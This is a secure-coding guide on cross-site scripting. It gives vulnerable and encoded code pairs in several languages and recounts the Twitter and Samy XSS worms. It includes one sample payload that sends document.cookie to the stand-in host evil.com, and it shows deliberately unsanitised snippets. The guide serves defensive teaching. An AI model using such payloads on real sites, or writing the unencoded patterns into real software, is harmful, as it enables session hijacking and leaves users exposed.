Fixing XSS

Tools recognizing this:

Opengrep Fortify Checkmarx SonarQube Snyk Semgrep CodeQL

What is Cross-Site Scripting

Cross-Site Scripting (XSS) is a critical security vulnerability that occurs when an application includes untrusted data in a web page without proper validation or encoding.

The malicious scripts can be executed in the victim's browser, allowing attackers to:

• Steal session cookies and hijack user sessions

• Capture keystrokes and steal sensitive data

• Deface websites or modify content

• Redirect users to malicious sites

• Execute arbitrary JavaScript code in the user's context

One Simple Example

Consider this classic example of displaying user input:

// Fetch 'userName' parameter from the URL
var urlParams = new URLSearchParams(window.location.search);var userName = urlParams.get('userName');
// Post it back as HTML
document.getElementById("welcome").innerHTML = "Welcome " + userName;

An attacker could provide this input for the userName:

<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>

The resulting HTML becomes:

<div id="welcome">Welcome <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>

This allows the attacker to steal the user's session cookie and send it to the attacker's server. The script executes in the victim's browser context with full access to their cookies.

Real-world Occurrences of XSS

Twitter XSS Worm (2010)

In 2010, Twitter was hit by the "onMouseOver" XSS worm that affected thousands of users. When users hovered their mouse over infected tweets, it would automatically retweet the malicious content. • How it happened: The vulnerability allowed JavaScript execution in tweets through improper input sanitization. • Impact: Rapid spread of malicious tweets and potential compromise of user accounts.

MySpace Samy Worm (2005)

The Samy worm infected over one million MySpace profiles in less than 24 hours. • How it happened: A user named Samy Kamkar exploited an XSS vulnerability to automatically add himself as a friend to anyone who viewed his profile. • Impact: Massive service disruption and demonstration of how quickly XSS attacks can spread.

Fixing Cross-Site Scripting

The most efficient way to fix XSS issues in your code is to properly encode all untrusted data before including it in HTML, JavaScript, CSS, or URLs.

Context-aware encoding ensures that user input is treated as data rather than code, preventing script execution. Different contexts (HTML, JavaScript, CSS, URLs) require different encoding strategies to be effective.

Code Samples

String userInput = request.getParameter("userInput");
out.println("<div>" + userInput + "</div>");

String userInput = request.getParameter("userInput");
String encodedInput = StringEscapeUtils.escapeHtml4(userInput);
out.println("<div>" + encodedInput + "</div>");

const userInput = urlParams.get('userInput');
element.innerHTML = userInput;

const userInput = urlParams.get('userInput');
const encodedInput = DOMPurify.sanitize(userInput);
element.innerHTML = encodedInput;

user_input = request.args.get('userInput')
return f"<div>{user_input}</div>"

from markupsafe import escape
user_input = request.args.get('userInput')
return f"<div>{escape(user_input)}</div>"

string userInput = Request.QueryString["userInput"];
Response.Write("<div>" + userInput + "</div>");

string userInput = Request.QueryString["userInput"];
string encodedInput = HttpUtility.HtmlEncode(userInput);
Response.Write("<div>" + encodedInput + "</div>");

$userInput = $_GET['userInput'];
echo "<div>$userInput</div>";

$userInput = $_GET['userInput'];
$encodedInput = htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');
echo "<div>$encodedInput</div>";

std::string userInput = request.getParameter("userInput");
response << "<div>" << userInput << "</div>";

std::string userInput = request.getParameter("userInput");
std::string encodedInput = htmlEncode(userInput);
response << "<div>" << encodedInput << "</div>";